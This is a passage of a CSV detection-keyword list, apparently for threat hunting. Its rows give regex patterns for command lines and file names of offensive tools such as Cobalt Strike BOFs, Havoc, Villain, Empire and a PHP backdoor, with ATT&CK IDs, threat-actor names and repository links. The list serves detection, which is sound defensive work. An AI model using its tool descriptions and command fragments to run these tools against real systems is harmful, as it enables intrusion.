*",".{0,1000}\s\-\-hash\-type\s.{0,1000}\s\-\-attack\-mode\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* hashview.py*",".{0,1000}\shashview\.py.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "* hashview-agent *",".{0,1000}\shashview\-agent\s.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","N/A","10","4","334","40","2024-04-27T11:55:25Z","2020-11-23T19:21:06Z" "* havoc-client*",".{0,1000}\shavoc\-client.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","0","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "* hbase-master-info.nse*",".{0,1000}\shbase\-master\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hbase-region-info.nse*",".{0,1000}\shbase\-region\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hddtemp-info.nse*",".{0,1000}\shddtemp\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* HiddenDesktop.cna*",".{0,1000}\sHiddenDesktop\.cna.{0,1000}","offensive_tool_keyword","cobaltstrike","Hidden Desktop (often referred to as HVNC) is a tool that allows operators to interact with a remote desktop session without the user knowing. The VNC protocol is not involved but the result is a similar experience. This Cobalt Strike BOF implementation was created as an alternative to TinyNuke/forks that are written in C++","T1021.001 - T1133","TA0005 - TA0002","N/A","N/A","C2","https://github.com/WKL-Sec/HiddenDesktop","1","0","N/A","10","10","1102","176","2023-12-07T17:15:48Z","2023-05-21T00:57:43Z" "* HijackDLL-Threads.dll*",".{0,1000}\sHijackDLL\-Threads\.dll.{0,1000}","offensive_tool_keyword","Accomplice","Tools for discovery and abuse of COM hijacks","T1120 - T1174","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/nccgroup/Accomplice","1","0","N/A","7","3","273","45","2019-10-15T21:54:09Z","2019-09-04T23:32:09Z" "* hiphp-cli.sh*",".{0,1000}\shiphp\-cli\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "* hiphp-desktop.sh*",".{0,1000}\shiphp\-desktop\.sh.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "* hnap-info.nse*",".{0,1000}\shnap\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* --hoax-port *",".{0,1000}\s\-\-hoax\-port\s.{0,1000}","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3572","575","2024-03-11T06:48:03Z","2022-10-25T22:02:59Z" "* hollow.x64.*",".{0,1000}\shollow\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","EarlyBird process hollowing technique (BOF) - Spawns a process in a suspended state. inject shellcode. hijack main thread with APC and execute shellcode","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/boku7/HOLLOW","1","0","N/A","10","10","257","56","2023-03-08T15:51:19Z","2021-07-21T15:58:18Z" "* --host * --port * --executable *.exe --command *cmd.exe*",".{0,1000}\s\-\-host\s.{0,1000}\s\-\-port\s.{0,1000}\s\-\-executable\s.{0,1000}\.exe\s\-\-command\s.{0,1000}cmd\.exe.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "* HostEnum.ps1*",".{0,1000}\sHostEnum\.ps1.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","N/A","10","10","4934","792","2024-04-23T05:14:51Z","2017-01-06T11:18:20Z" "* hostenum.py *",".{0,1000}\shostenum\.py\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","0","N/A","10","10","1095","192","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" "* --host-file *.txt -u * --prompt --admin --no-banner*",".{0,1000}\s\-\-host\-file\s.{0,1000}\.txt\s\-u\s.{0,1000}\s\-\-prompt\s\-\-admin\s\-\-no\-banner.{0,1000}","offensive_tool_keyword","smbmap","SMBMap allows users to enumerate samba share drives across an entire domain. List share drives. drive permissions. share contents. upload/download functionality. file name auto-download pattern matching. and even execute remote commands. This tool was designed with pen testing in mind. and is intended to simplify searching for potentially sensitive data across large networks.","T1210.001 - T1083 - T1213 - T1021","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Information Gathering","https://github.com/ShawnDEvans/smbmap","1","0","N/A","10","10","1687","337","2024-01-31T23:23:38Z","2015-03-16T13:15:00Z" "* hostmap-bfk.nse*",".{0,1000}\shostmap\-bfk\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hostmap-crtsh.nse*",".{0,1000}\shostmap\-crtsh\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* hostmap-robtex.nse*",".{0,1000}\shostmap\-robtex\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* HostRecon.ps1*",".{0,1000}\sHostRecon\.ps1.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tools","https://github.com/Orange-Cyberdefense/arsenal","1","0","commands cheat sheets","8","10","N/A","N/A","N/A","N/A" "* -Hosts * -TopPorts *",".{0,1000}\s\-Hosts\s.{0,1000}\s\-TopPorts\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-Portscan.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "* hping3 *",".{0,1000}\shping3\s.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","N/A","N/A","10","1375","327","2024-04-02T03:16:21Z","2012-06-13T17:41:54Z" "* http://localhost:8080 -o agent*",".{0,1000}\shttp\:\/\/localhost\:8080\s\-o\sagent.{0,1000}","offensive_tool_keyword","Ares","Python C2 botnet and backdoor ","T1105 - T1102 - T1055","TA0003 - TA0002 - TA0007","N/A","N/A","C2","https://github.com/sweetsoftware/Ares","1","0","N/A","10","10","1502","474","2023-03-02T12:43:09Z","2015-10-18T12:26:27Z" "* http_malleable*",".{0,1000}\shttp_malleable.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","3911","555","2024-02-22T06:44:28Z","2019-08-01T04:22:31Z" "* --http-address 127.0.0.1:8181*",".{0,1000}\s\-\-http\-address\s127\.0\.0\.1\:8181.{0,1000}","offensive_tool_keyword","reverst","Reverse Tunnels in Go over HTTP/3 and QUIC","T1090 - T1571 - T1071 - T1095","TA0011 - TA0001 - TA0008","N/A","N/A","C2","https://github.com/flipt-io/reverst","1","0","N/A","10","10","611","22","2024-05-01T12:27:28Z","2024-04-03T13:32:11Z" "* http-adobe-coldfusion-apsa1301.nse*",".{0,1000}\shttp\-adobe\-coldfusion\-apsa1301\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-affiliate-id.nse*",".{0,1000}\shttp\-affiliate\-id\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-apache-negotiation.nse*",".{0,1000}\shttp\-apache\-negotiation\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-apache-server-status.nse*",".{0,1000}\shttp\-apache\-server\-status\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-aspnet-debug.nse*",".{0,1000}\shttp\-aspnet\-debug\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-auth.nse*",".{0,1000}\shttp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-auth-finder.nse*",".{0,1000}\shttp\-auth\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-avaya-ipoffice-users.nse*",".{0,1000}\shttp\-avaya\-ipoffice\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-awstatstotals-exec.nse*",".{0,1000}\shttp\-awstatstotals\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-axis2-dir-traversal.nse*",".{0,1000}\shttp\-axis2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-backup-finder.nse*",".{0,1000}\shttp\-backup\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-barracuda-dir-traversal.nse*",".{0,1000}\shttp\-barracuda\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-bigip-cookie.nse*",".{0,1000}\shttp\-bigip\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-brute.nse*",".{0,1000}\shttp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-cakephp-version.nse*",".{0,1000}\shttp\-cakephp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-chrono.nse*",".{0,1000}\shttp\-chrono\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-cisco-anyconnect.nse*",".{0,1000}\shttp\-cisco\-anyconnect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-coldfusion-subzero.nse*",".{0,1000}\shttp\-coldfusion\-subzero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-comments-displayer.nse*",".{0,1000}\shttp\-comments\-displayer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-config-backup.nse*",".{0,1000}\shttp\-config\-backup\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-cookie-flags.nse*",".{0,1000}\shttp\-cookie\-flags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-cors.nse*",".{0,1000}\shttp\-cors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-cross-domain-policy.nse*",".{0,1000}\shttp\-cross\-domain\-policy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-csrf.nse*",".{0,1000}\shttp\-csrf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-date.nse*",".{0,1000}\shttp\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* http-default-accounts.nse*",".{0,1000}\shttp\-default\-accounts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - 